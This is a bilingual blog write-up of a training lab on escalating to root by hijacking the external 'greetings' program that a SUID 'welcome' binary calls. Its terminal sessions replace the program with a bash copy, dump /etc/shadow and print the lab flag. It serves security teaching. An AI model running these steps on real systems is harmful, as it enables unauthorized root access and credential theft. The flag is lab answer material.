Exploiting SUID Binaries

Posted by r3kind1e on November 3, 2022

Exploiting SUID Binaries

Exploiting SUID Binaries

In addition to the three main file access permissions (read, write and execute), Linux also provides users with specialized permissions that can be utilized in specific situations. One of these access permissions is the SUID (Set Owner User ID) permission.

When applied, this permission provides users with the ability to execute a script or binary with the permissions of the file owner as opposed to the user that is running the script or binary.

SUID permissions are typically used to provide unprivileged users with the ability to run specific scripts or binaries with “root” permissions. It is to be noted, however, that the provision of elevate privileges is limited to the execution of the script and does not translate to elevation of privileges, however, if improperly configured unprivileged users can exploit misconfigurations or vulnerabilities within the binary or script to obtain an elevated session.

This is the functionality that we will be attempting to exploit in order to elevate our privileges, however, the success of our attack will depend on the following factors:

  • Owner of the SUID binary - Given that we are attempting to elevate our privileges, we will only be exploiting SUID binaries that are owned by the “root” user or other privileged users.

  • Access permissions - We will require executable permissions in order to execute the SUID binary.

利用 SUID 二进制文件

利用 SUID 二进制文件

除了三个主要的文件访问权限(读、写和执行)之外,Linux 还为用户提供了可以在特定情况下使用的专用权限。 这些访问权限之一是 SUID(设置所有者用户 ID)权限。

应用此权限后,用户可以使用文件所有者的权限执行脚本或二进制文件,而不是运行脚本或二进制文件的用户。

SUID 权限通常用于为非特权用户提供以“root”权限运行特定脚本或二进制文件的能力。 然而,需要注意的是,提升权限的提供仅限于脚本的执行,并且不会转化为权限提升,但是,如果配置不当,非特权用户可以利用二进制文件或脚本中的错误配置或漏洞来获取一个提升的会话。

I want you to think of a binary on Linux that allows standard users or users to execute specific commands with root privileges. One of these binaries is the sudo binary. So the sudo binary allows user to essentially execute specific commands with root privileges, of course they need to provide their password and they need to be part of the sudo group. However, that particular binary is owned by the root user, and it is an SUID binary in that it allows unprivileged users to execute that specific binary with elevated privileges.

这是我们将尝试利用以提升我们的权限的功能,但是,我们的攻击的成功将取决于以下因素:

  • SUID 二进制文件的所有者 - 鉴于我们正试图提升我们的权限,我们只会利用“root”用户或其他特权用户拥有的 SUID 二进制文件。
  • 访问权限 - 我们需要可执行权限才能执行 SUID 二进制文件。

Demo: Exploiting SUID Binaries(演示:利用 SUID 二进制文件)

1
2
3
4
student@attackdefense:~$ whoami
student
student@attackdefense:~$ groups student
student : student
1
2
3
4
5
student@attackdefense:~$ pwd
/home/student
student@attackdefense:~$ ls -al
-r-x------ 1 root root 8296 Sep 22 2018 greetings
-rwsr-xr-x 1 root root 8344 Sep 22 2018 welcome

welcome is owned by the root user. We can execute this particular binary. Every user, every other user account and group on the system can execute this binary. If you pay attention to this s permission here, that is the SUID permission. So if you take a look at the other binaries here, they don’t have the s permission applied here, which is implies that the SUID permission has been applied to this particular binary, which means it is executed with root prvileges.

1
2
3
4
student@attackdefense:~$ ./greetings
bash: ./greetings: Permission denied
student@attackdefense:~$ ./welcome
Welcome to Attack Defense Labs

Learn more about this particular welcome binary and the way we can do that is by utilizing the type or file command.

1
2
student@attackdefense:~$ file welcome
welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped

It’ll tell us that is a standard ELF binary for Linux. It gives you an idea as to what shared objects /lib64/ld-linux-x86-64.so.2 are being loaded by this particular binary. That is also another alternative when it comes down to exploiting SUID binaries. If you can somehow find missing shared objects, you can essentially create your own shared object and get this binary to load it. And of course, that shared object is going to be malicious in narture, or it is going to execute malicious commands that will elevate your sessions.

But in this case, this particular binary doesn’t have any missing shared objects.

Let’s try and identify what strings we can find within the binary. So thestrings command will essentially give us a list of strings within the binary. This is just basic static analysis.

1
2
3
4
5
6
student@attackdefense:~$ strings welcome
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
...
greetings

Let’s start off from the beginning. It actually loads or calls upon the shared object here, and another one right over there. You can see the setuid permission. It calls upon the greetings binary. It’s calling upon an external binary. What if we create or modify the greetings binary, and we have it execute a command like bash or we have it execute the bash binary. And of course, because this particular welcome binary is being executed with root privileges, because it is an SUID binary, then it will execute the command specified within the greetings binary.

And we can actually get rid of the current greetings binary here.

1
student@attackdefense:~$ rm greetings

We can create our own greetings binary. We create a copy of bash and we’re going to save it as greetings. This is essentially a bash binary, but it’s called greetings.

1
2
3
student@attackdefense:~$ cp /bin/bash greetings
student@attackdefense:~$ ls
greetings welcome

Because the welcome binary calls upon the greetings binary, it’ll execute bash with root privileges, which will consequently provide us with a root bash session with elevated privileges.

It’s going to execute the greetings binary, which is, in essence, just a bash binary. And we immediately obtain root privileges. If I say id, we currently have access as the root user.

1
2
3
4
5
6
student@attackdefense:~$ ./welcome
root@attackdefense:~# id
uid=0(root) gid=999(student) groups=999(student)
root@attackdefense:~# whoami
root
root@attackdefense:~# cat /etc/shadow

We have successfully been able to elevate our privileges through the use of an SUID binary.

These’s multiple misconfigurations that you can look for. One of them is to obtain missing shared objects that are being called upon by the SUID binary and creating your own shared object. Once the binary is executed, it will then find the shared object that it couldn’t find before and it will execute that shared obejct with the malicious commands that you’ve actually entered within the shared object file, consequently providing you with elevated privileges.

Exploiting Setuid Programs

Vulnerable setuid programs on Linux systems could lead to privilege escalation attacks. In this lab, you are provided a regular user account and need to escalate your privileges to become root. There are 2 programs in your home directory welcome and greetings which might be vulnerable.

Your mission:

  1. Get as root shell on the system
  2. View /etc/shadow
  3. Retrieve the flag.

Note: Development tools e.g. gcc is installed on the system already.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
student@attackdefense:~$ whoami
student
student@attackdefense:~$ groups student
student : student
student@attackdefense:~$ ls -al
total 36
drwxr-xr-x 1 student student 4096 Sep 22  2018 .
drwxr-xr-x 1 root    root    4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root      88 Sep 22  2018 .bashrc
-r-x------ 1 root    root    8296 Sep 22  2018 greetings
-rwsr-xr-x 1 root    root    8344 Sep 22  2018 welcome
student@attackdefense:~$ cat greetings
cat: greetings: Permission denied
student@attackdefense:~$ ./welcome
Welcome to Attack Defense Labs
1
2
student@attackdefense:~$ file welcome
welcome: setuid ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=199bc8fd6e66e29f770cdc90ece1b95484f34fca, not stripped
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
student@attackdefense:~$ strings welcome
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
__libc_start_main
GLIBC_2.2.5
_ITM_deregisterTMCloneTable
__gmon_start__
_ITM_registerTMCloneTable
AWAVI
AUATL
[]A\A]A^A_
greetings
;*3$"
GCC: (Ubuntu 7.3.0-16ubuntu3) 7.3.0
crtstuff.c
deregister_tm_clones
__do_global_dtors_aux
completed.7696
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
welcome.c
__FRAME_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.dynamic
.data
.bss
.comment
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
student@attackdefense:~$ rm greetings
rm: remove write-protected regular file 'greetings'? y
student@attackdefense:~$ cp /bin/bash greetings
student@attackdefense:~$ ls -al
total 1116
drwxr-xr-x 1 student student    4096 Nov  3 13:52 .
drwxr-xr-x 1 root    root       4096 Sep 22  2018 ..
-rw-r--r-- 1 root    root         88 Sep 22  2018 .bashrc
-rwxr-xr-x 1 student student 1113504 Nov  3 13:52 greetings
-rwsr-xr-x 1 root    root       8344 Sep 22  2018 welcome
student@attackdefense:~$ ./welcome
root@attackdefense:~# whoami
root
root@attackdefense:~# cat /etc/shadow
root:*:17764:0:99999:7:::
daemon:*:17764:0:99999:7:::
bin:*:17764:0:99999:7:::
sys:*:17764:0:99999:7:::
sync:*:17764:0:99999:7:::
games:*:17764:0:99999:7:::
man:*:17764:0:99999:7:::
lp:*:17764:0:99999:7:::
mail:*:17764:0:99999:7:::
news:*:17764:0:99999:7:::
uucp:*:17764:0:99999:7:::
proxy:*:17764:0:99999:7:::
www-data:*:17764:0:99999:7:::
backup:*:17764:0:99999:7:::
list:*:17764:0:99999:7:::
irc:*:17764:0:99999:7:::
gnats:*:17764:0:99999:7:::
nobody:*:17764:0:99999:7:::
_apt:*:17764:0:99999:7:::
student:!:17796::::::
root@attackdefense:~# find / -name flag
find: '/proc/tty/driver': Permission denied
find: '/proc/1/map_files': Permission denied
find: '/proc/7/map_files': Permission denied
find: '/proc/9/map_files': Permission denied
find: '/proc/26/map_files': Permission denied
/root/flag
root@attackdefense:~# cat /root/flag
b92bcdc876d52108778e2d81f3b01494